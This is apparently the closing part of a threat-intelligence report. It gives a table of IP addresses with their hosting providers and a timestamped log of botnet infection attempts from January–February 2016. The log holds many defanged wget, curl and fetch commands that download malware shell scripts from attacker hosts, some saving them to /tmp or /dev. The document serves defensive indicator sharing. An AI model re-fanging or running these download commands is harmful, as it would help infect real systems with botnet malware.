185.130.5.246, - ,203569 , 185.130.5.0/24 , SILK , LT , - , Sindicate Group Ltd
185.17.30.239, - ,199420 , 185.17.28.0/22 , FLYGROUP , RU , fly-group.ru , OOO Fly Engeneering Group
185.29.9.253,"ip-9-253.dataclub.biz",60567 , 185.29.9.0/24 , DATACLUB , SE , dataclub.biz , Virtual Servers
185.52.2.114,"web.minsupport.net",198203 , 185.52.0.0/22 , ASN , NL , ramnode.com , RamNode LLC
185.62.189.11,"cacti.s42.voby.se",49349 , 185.62.189.0/24 , DOTSI , PT , nforce.com , NForce Entertainment B.V.
185.62.190.156,"hosted-by.blazingfast.io",49349 , 185.62.190.0/24 , DOTSI , PT , nforce.com , NForce Entertainment B.V.
185.62.190.253,"hosted-by.blazingfast.io",49349 , 185.62.190.0/24 , DOTSI , PT , nforce.com , NForce Entertainment B.V.
185.62.190.62,"hosted-by.blazingfast.io",49349 , 185.62.190.0/24 , DOTSI , PT , nforce.com , NForce Entertainment B.V.
192.227.170.67,"www.AlphaNineVPS.com",36352 , 192.227.168.0/21 , AS-COLOCROSSING , US , hudsonvalleyhost.com , Hudson Valley Host
192.227.177.120,"192-227-177-120-host.colocrossing.com",36352 , 192.227.176.0/22 , AS-COLOCROSSING , US , nwnx.net , New Wave Netconnect LLC
192.227.177.127,"192-227-177-127-host.colocrossing.com",36352 , 192.227.176.0/22 , AS-COLOCROSSING , US , nwnx.net , New Wave Netconnect LLC
192.243.109.128, - ,11878 , 192.243.96.0/20 , TZULO , US , vpscheap.net , VPS Cheap Inc.
192.243.109.5, - ,11878 , 192.243.96.0/20 , TZULO , US , vpscheap.net , VPS Cheap Inc.
198.12.97.67,"198-12-97-67-host.enwebhost.net",36352 , 198.12.96.0/20 , AS-COLOCROSSING , US , colocrossing.com , ColoCrossing
198.12.97.93,"198-12-97-93-host.enwebhost.net",36352 , 198.12.96.0/20 , AS-COLOCROSSING , US , colocrossing.com , ColoCrossing
198.23.238.203,"198-23-238-203-host.enwebhost.net",36352 , 198.23.232.0/21 , AS-COLOCROSSING , US , enwebhost.net , Enwebhost
198.23.238.215,"198-23-238-215-host.enwebhost.net",36352 , 198.23.232.0/21 , AS-COLOCROSSING , US , enwebhost.net , Enwebhost
198.23.238.251,"198-23-238-251-host.enwebhost.net",36352 , 198.23.232.0/21 , AS-COLOCROSSING , US , enwebhost.net , Enwebhost
199.180.133.178,"watchhere.docadvices.com",23033 , 199.180.133.0/24 , WOW , US , virpus.com , DNSSlave.com
199.180.133.214, - ,23033 , 199.180.133.0/24 , WOW , US , virpus.com , DNSSlave.com
199.231.184.237,"mail10.sipanhost.com",19318 , 199.231.184.0/21 , NJIIX-AS-1 , US , interserver.net , Interserver Inc
206.72.207.194,"lht194.cowanci.com",19318 , 206.72.192.0/20 , NJIIX-AS-1 , US , interserver.net , Interserver Inc
208.67.1.142, - ,33387 , 208.67.1.0/24 , DATASHACK , US , wholesaledatacenter.com , Wholesale Data Center LLC
208.67.1.165, - ,33387 , 208.67.1.0/24 , DATASHACK , US , wholesaledatacenter.com , Wholesale Data Center LLC
208.67.1.2, - ,33387 , 208.67.1.0/24 , DATASHACK , US , hmccah.com , HMC/Cah
208.67.1.3, - ,33387 , 208.67.1.0/24 , DATASHACK , US , hmccah.com , HMC/Cah
208.67.1.40, - ,33387 , 208.67.1.0/24 , DATASHACK , US , wholesaledatacenter.com , Fletcher Grant
208.67.1.52, - ,33387 , 208.67.1.0/24 , DATASHACK , US , wholesaledatacenter.com , Wholesale Data Center LLC
208.67.1.73, - ,33387 , 208.67.1.0/24 , DATASHACK , US , tricension.net , Tricension
208.67.1.88, - ,33387 , 208.67.1.0/24 , DATASHACK , US , tricension.net , Tricension
208.73.207.236,"sonypaio.com",19318 , 208.73.200.0/21 , NJIIX-AS-1 , US , interserver.net , Interserver Inc
208.89.211.111,"server6.lega-helplineservice.com",23033 , 208.89.211.0/24 , WOW , US , virpus.com , DNSSlave.com
208.89.211.141, - ,23033 , 208.89.211.0/24 , WOW , US , virpus.com , DNSSlave.com
216.158.225.7,"server.iceybinary.com",19318 , 216.158.224.0/23 , NJIIX-AS-1 , US , interserver.net , Interserver Inc
218.104.49.211, - ,9929 , 218.104.48.0/23 , CNCNET , CN , chinaunicom.com , China Unicom IP Network
23.227.163.110, - ,54540 , 23.227.163.0/24 , INCERO , US , inceronetwork.com , Incero LLC
23.89.158.69,"69.158-89-23.rdns.scalabledns.com",18978 , 23.89.128.0/18 , ENZUINC-US , US , enzu.com , Enzu Inc
23.94.29.218,"23-94-29-218-host.colocrossing.com",36352 , 23.94.16.0/20 , AS-COLOCROSSING , US , nwnx.net , New Wave Netconnect LLC
31.14.136.142,"host142-136-14-31.serverdedicati.aruba.it",31034 , 31.14.128.0/20 , ARUBA , IT , jump.ro , Jump Management SRL
45.32.232.197,"45.32.232.197.vultr.com",20473 , 45.32.232.0/21 , AS-CHOOPA , US , choopa.com , Choopa LLC
46.101.71.240, - ,201229 , 46.101.68.0/22 , DIGITALOCEAN , DE , digitalocean.com , Digital Ocean Inc.
5.196.249.163, - ,16276 , 5.196.0.0/16 , OVH , FR , ovh.com , OVH SAS
51.254.212.84,"84.ip-51-254-212.eu",16276 , 51.254.0.0/15 , OVH , FR , ovh.com , OVH SAS
51.254.238.19, - ,16276 , 51.254.0.0/15 , OVH , FR , ovh.com , OVH SAS
64.20.33.134,"test.interserver.net",19318 , 64.20.32.0/19 , NJIIX-AS-1 , US , fasttechrev.com , Hosting Needs
74.118.193.239,"mail.rodesleads.info",46664 , 74.118.192.0/22 , VOLUMEDRIVE , US , volumedrive.com , VolumeDrive
79.143.181.158,"vmi59412.contabo.host",51167 , 79.143.180.0/23 , CONTABO , DE , contabo.de , Contabo GmbH
80.82.64.177, - ,29073 , 80.82.64.0/24 , QUASINETWORKS , NL , ecatel.net , Ecatel LTD
89.248.162.171,"no-reverse-dns-configured.com",29073 , 89.248.160.0/21 , QUASINETWORKS , NL , ecatel.net , Ecatel LTD
89.248.166.131,"no-reverse-dns-configured.com",29073 , 89.248.160.0/21 , QUASINETWORKS , NL , ecatel.net , Ecatel LTD
93.171.158.242,"ua63.com",201094 , 93.171.158.0/23 , GMHOST , UA , - , PE Dunaeivskyi Denys Leonidovich
94.102.49.197,"no-reverse-dns-configured.com",29073 , 94.102.48.0/20 , QUASINETWORKS , NL , ecatel.net , Ecatel LTD
94.102.53.144, - ,29073 , 94.102.48.0/20 , QUASINETWORKS , NL , ecatel.net , Ecatel LTD
94.102.63.136,"no-reverse-dns-configured.com",29073 , 94.102.48.0/20 , QUASINETWORKS , NL , ecatel.net , Ecatel LTD

5. Log of infection attempts time stamp (as cyber incident evidence):

2016-02-07 09:28:17 | wget hxxp:// 199.180.133.178/gb . sh
2016-02-07 07:32:41 | wget -q hxxp:// 198.23.238.215/Sharky/gb . sh
2016-02-07 07:32:40 | wget -q hxxp:// 198.23.238.215/Sharky/gb . sh
2016-02-07 02:53:41 | wget ftx://199.231.184.237/gtop . sh
2016-02-07 02:53:19 | wget ftx://199.231.184.237/gtop . sh
2016-02-07 02:43:05 | wget -q hxxp:// 198.23.238.215/Sharky/gb . sh
2016-02-07 02:43:03 | wget -q hxxp:// 198.23.238.215/Sharky/gb . sh
2016-02-06 21:13:35 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-06 21:08:45 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-06 20:07:20 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-06 19:05:34 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-06 16:45:10 | wget hxxp:// 173.208.196.202/bin . sh
2016-02-06 16:39:47 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 16:39:47 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 16:21:26 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 16:21:24 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 16:07:20 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 16:07:19 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 16:01:37 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 15:56:40 | wget hxxp:// 173.208.196.202/bin . sh
2016-02-06 15:26:51 | wget ftx://199.231.184.237/gtop . sh
2016-02-06 15:26:29 | wget ftx://199.231.184.237/gtop . sh
2016-02-06 15:20:01 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 15:10:50 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 15:10:49 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 15:03:38 | wget -q hxxp:// 208.67.1.88/Bots . sh; 
                              curl -O hxxp:// 208.67.1.88/Bots . sh
2016-02-06 14:50:55 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 14:50:55 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 14:32:41 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 14:32:40 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 14:19:15 | wget ftx://199.231.184.237/gtop . sh
2016-02-06 14:18:29 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 14:18:28 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 14:10:31 | wget ftx://199.231.184.237/gtop . sh
2016-02-06 05:54:46 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 05:53:55 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 05:14:34 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 05:10:55 | wget hxxp:// 173.208.196.202/bin . sh
2016-02-06 05:00:33 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 04:50:58 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 04:48:09 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 04:38:09 | wget hxxp:// 173.208.196.202/bin . sh
2016-02-06 04:37:42 | wget hxxp:// 173.208.196.202/bin . sh
2016-02-06 04:06:58 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 03:53:04 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 03:41:42 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-06 03:26:44 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 03:11:10 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 02:52:44 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 02:49:12 | wget ftx://199.231.184.237/gtop . sh
2016-02-06 02:41:54 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 02:38:04 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 02:16:13 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-06 01:36:28 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 01:22:23 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-06 00:56:47 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-05 23:35:07 | wget ftx://199.231.184.237/gtop . sh
2016-02-05 23:02:54 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 22:59:49 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-05 22:48:41 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-05 22:48:41 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-05 22:35:55 | wget hxxp:// 208.67.1.73/gtop . sh
2016-02-05 22:27:07 | wget hxxp:// 185.130.5.246/bin . sh
2016-02-05 20:34:10 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-05 20:30:07 | wget hxxp:// 185.62.190.253/h . sh
2016-02-05 19:37:34 | wget ftx://199.231.184.237/gtop . sh
2016-02-05 19:12:30 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-05 17:37:32 | wget -q hxxp:// 23.227.163.110/Bots/Bots . sh
2016-02-05 17:25:07 | wget -q hxxp:// 208.67.1.88/Bots . sh;
                              curl -O hxxp:// 208.67.1.88/Bots . sh
2016-02-05 17:11:41 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 16:57:42 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 16:53:47 | wget hxxp:// "www.hongcherng.com"/rd/rd . sh-O /tmp/rd . sh
2016-02-05 16:35:55 | wget hxxp:// 185.17.30.239/gb . sh-O /dev/gb . sh
2016-02-05 16:28:58 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 15:22:29 | wget ftx://199.231.184.237/gtop . sh
2016-02-05 14:49:42 | wget ftx://199.231.184.237/gtop . sh
2016-02-05 14:24:34 | wget ftx://199.231.184.237/gtop . sh
2016-02-05 12:57:25 | wget hxxp:// 51.254.212.84/busybox . sh
2016-02-05 05:17:28 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-05 05:17:24 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-05 05:02:22 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 04:16:29 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 03:13:40 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-05 03:13:37 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-05 03:08:11 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 02:53:57 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-05 02:27:49 | wget -q hxxp:// 185.52.2.114/h . sh
2016-02-05 01:53:07 | wget -q hxxp:// 208.67.1.88/Bots . sh;
                              curl -O hxxp:// 208.67.1.88/Bots . sh
2016-02-04 23:57:43 | wget -q hxxp:// 208.67.1.88/Bots . sh;
                              curl -O hxxp:// 208.67.1.88/Bots . sh
2016-02-04 23:52:45 | wget hxxp:// 208.67.1.73/gtop . sh
2016-02-04 23:37:23 | wget hxxp:// 208.67.1.73/gtop . sh
2016-02-04 23:31:59 | wget -q hxxp:// 208.67.1.88/Bots . sh;
                              curl -O hxxp:// 208.67.1.88/Bots . sh
2016-02-04 23:19:54 | wget -q hxxp:// 185.130.5.200/bin . sh;
                              curl -O hxxp:// 185.130.5.200/bin . sh
2016-02-04 21:39:37 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-04 21:39:35 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-04 16:42:04 | wget -q hxxp:// 185.52.2.114/h . sh
2016-02-04 09:08:52 | wget hxxp:// 185.17.30.239/gb . sh-O /dev/gb . sh
2016-02-04 08:18:15 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-04 08:18:12 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-04 05:37:42 | wget -q hxxp:// 51.254.212.84/busybox . sh
2016-02-04 02:24:07 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-03 22:03:45 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 21:53:31 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 20:53:03 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 20:50:56 | wget hxxp:// 199.231.184.237/gtop . sh
2016-02-03 19:27:27 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 19:13:31 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 15:26:15 | wget hxxp:// 185.112.249.111/gtop . sh
2016-02-03 15:09:15 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 14:55:09 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 14:47:47 | wget hxxp:// 185.112.249.111/gtop . sh
2016-02-03 13:56:59 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 13:40:26 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 08:12:38 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-03 08:12:35 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-03 05:18:19 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 05:06:33 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-03 04:52:47 | wget hxxp:// 176.123.29.105/bin . sh
2016-02-03 02:26:22 | wget hxxp:// 208.67.1.142/hack/Binarys . sh
2016-02-03 01:10:27 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-03 00:58:32 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-03 00:01:30 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-02 22:43:01 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-02 22:36:19 | wget hxxp:// 185.112.249.26/gtop . sh
2016-02-02 21:28:54 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-02 18:25:35 | wget hxxp:// 185.17.30.239/gb . sh-O /dev/gb . sh
2016-02-02 13:34:51 | wget hxxp:// 185.112.249.111/gtop . sh
2016-02-02 13:16:29 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-02 13:06:42 | wget hxxp:// 185.112.249.111/gtop . sh
2016-02-02 12:46:48 | wget hxxp:// 185.112.249.111/gtop . sh
2016-02-02 11:05:21 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-02 06:32:25 | wget hxxp:// 185.17.30.239/gb . sh-O /dev/gb . sh
2016-02-02 01:53:15 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-02 01:53:15 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-01 23:43:22 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-01 22:41:07 | wget hxxp:// feds.pw/feds/gb . sh
2016-02-01 17:10:33 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 16:15:24 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-02-01 13:35:18 | wget hxxp:// 185.17.30.239/gb . sh-O /dev/gb . sh
2016-02-01 11:48:58 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 07:21:48 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-01 07:21:48 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-01 06:52:14 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 05:19:06 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 02:43:18 | wget hxxp:// 185.29.9.253/DOGDICKS/Binarys . sh
2016-02-01 01:59:09 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 01:27:37 | wget hxxp:// 107.172.23.133/gtop . sh
2016-02-01 01:24:01 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 01:10:43 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-01 01:10:42 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-02-01 01:05:45 | wget hxxp:// 107.172.23.133/gtop . sh
2016-02-01 01:00:10 | wget hxxp:// 185.112.249.253/gtop . sh
2016-02-01 00:01:05 | wget hxxp:// 107.172.23.133/gtop . sh
2016-02-01 00:00:16 | wget hxxp:// 185.112.249.253/gtop . sh
2016-01-31 20:06:58 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-01-31 19:38:03 | wget hxxp:// 185.112.249.253/gtop . sh
2016-01-31 17:02:29 | wget hxxp:// 185.112.249.253/gtop . sh
2016-01-31 12:19:56 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-01-31 10:30:13 | wget hxxp:// 192.243.109.5/DOGDICKS/gtop . sh
2016-01-31 06:55:10 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-31 01:42:39 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-31 01:29:38 | wget -q hxxp:// 173.242.119.122/lol . sh
2016-01-31 01:27:33 | wget -q hxxp:// 173.242.119.122/lol . sh
2016-01-31 01:17:19 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-31 00:53:32 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-31 00:49:01 | wget -q hxxp:// 173.242.119.122/lol . sh
2016-01-30 21:52:47 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-30 21:52:47 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-30 20:33:49 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-30 20:00:15 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-30 16:11:18 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 15:01:18 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 03:59:18 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-30 03:41:57 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 03:13:12 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 02:50:41 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-30 02:16:54 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 01:48:32 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 01:27:04 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 01:03:57 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-30 00:38:02 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-29 23:25:54 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-29 23:25:51 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-29 22:21:59 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-29 21:58:26 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-29 15:48:44 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-29 15:38:32 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-29 12:38:33 | wget hxxp:// 173.214.160.90/gtop . sh-O /tmp/gtop . sh
2016-01-29 12:12:42 | wget hxxp:// 173.214.160.90/gtop . sh-O /tmp/gtop . sh
2016-01-29 06:51:54 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-29 06:51:51 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-29 06:04:44 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-29 05:43:58 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-29 05:43:56 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-29 02:37:01 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-29 02:04:59 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-29 01:46:33 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-29 01:27:27 | wget ftx://23.89.158.69/gtop . sh-O /tmp/gtop . sh
2016-01-29 01:04:07 | wget ftx://23.89.158.69/gtop . sh-O /tmp/gtop . sh
2016-01-28 20:17:10 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-28 14:22:53 | wget hxxp:// 198.23.238.251/gb . sh
2016-01-28 11:44:52 | wget ftx://23.89.158.69/gtop . sh
2016-01-28 11:30:23 | wget ftx://23.89.158.69/gtop . sh
2016-01-28 07:35:08 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-28 07:35:08 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-28 04:11:21 | wget -q hxxp:// 162.213.195.144/Bots/f . sh
2016-01-27 20:34:49 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-27 20:34:47 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-27 16:07:37 | wget ftx://23.89.158.69/gtop . sh-O /tmp/gtop . sh
2016-01-27 12:40:52 | wget ftx://23.89.158.69/gtop . sh-O /tmp/gtop . sh
2016-01-27 11:36:57 | wget ftx://23.89.158.69/gtop . sh-O /tmp/gtop . sh
2016-01-27 11:26:49 | wget ftx://23.89.158.69/gtop . sh
2016-01-27 10:50:10 | wget ftx://23.89.158.69/gtop . sh
2016-01-27 10:07:17 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-26 08:01:29 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-26 08:01:26 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-25 21:33:13 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-25 21:05:57 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-25 18:30:30 | wget hxxp:// 163.47.11.201/gtop . sh
2016-01-25 18:03:35 | wget hxxp:// 163.47.11.201/gtop . sh
2016-01-25 17:23:50 | wget hxxp:// 163.47.11.201/gtop . sh
2016-01-25 17:10:36 | wget -q hxxp:// 185.130.5.205/bin . sh; 
                              fetch hxxp:// 185.130.5.205/bin . sh; 
                              lwp-download hxxp:// 185.130.5.205/bin . sh; 
                              curl -O hxxp:// 185.130.5.205/bin . sh
2016-01-25 17:07:52 | wget hxxp:// 163.47.11.201/gtop . sh
2016-01-25 17:00:40 | wget hxxp:// 163.47.11.201/gtop . sh
2016-01-25 15:19:33 | wget hxxp:// 163.47.11.201/gtop . sh
2016-01-25 15:06:55 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-25 14:48:06 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-25 04:16:09 | wget hxxp:// 46.101.71.240/gtop . sh
2016-01-25 04:04:00 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-25 03:46:01 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-25 03:24:12 | wget hxxp:// 178.19.111.244/bin . sh
2016-01-25 02:54:05 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-25 02:53:59 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-25 02:25:41 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-25 02:19:41 | wget hxxp:// 208.67.1.2/DOGDICKS/Binarys . sh
2016-01-25 01:34:10 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-25 01:33:39 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-25 01:13:21 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-25 00:50:59 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-25 00:21:05 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 23:37:31 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-24 22:46:40 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-24 22:44:21 | wget hxxp:// 178.19.111.244/bin . sh
2016-01-24 22:29:34 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-24 22:25:10 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 21:49:52 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-24 12:56:39 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 11:32:43 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 08:20:29 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-24 08:20:26 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-24 07:22:52 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 06:37:33 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 04:40:34 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 04:10:18 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-24 02:17:06 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-24 01:37:50 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 01:18:03 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-24 00:58:46 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-23 23:40:45 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-23 21:15:50 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-23 20:42:40 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-23 16:36:16 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-23 14:55:17 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-23 04:28:24 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-23 04:09:07 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-23 02:47:09 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 20:51:48 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 19:48:54 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 19:47:24 | wget hxxp:// 178.19.111.244/y . sh
2016-01-22 19:27:17 | wget hxxp:// 178.19.111.244/y . sh
2016-01-22 19:27:15 | wget hxxp:// 178.19.111.244/y . sh
2016-01-22 17:50:05 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 16:44:18 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 15:56:34 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 05:51:56 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-22 03:24:22 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-21 22:10:20 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-21 17:49:26 | wget hxxp:// iplogger.xyz/DOGDICKS/Binarys . sh
2016-01-21 16:21:59 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-21 13:52:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 13:52:01 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 07:26:36 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-21 07:02:10 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
